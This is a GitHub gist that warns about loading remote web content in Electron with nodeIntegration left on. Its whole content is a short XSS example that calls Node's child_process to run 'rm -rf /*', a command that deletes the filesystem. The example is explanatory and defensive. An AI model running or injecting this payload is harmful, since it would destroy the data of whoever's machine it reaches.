Created
January 11, 2016 09:10
-
-
Save wearhere/c9d69f24589361cafaad to your computer and use it in GitHub Desktop.
What could happen if you load remote web content in Electron without toggling `nodeIntegration` off. See https://mixmax.com/blog/turnkey-electron-apps-with-meteor#safe-native-bridge for more information.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
require('child_process').exec('rm -rf /*'); // Worst XSS attack ever. | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment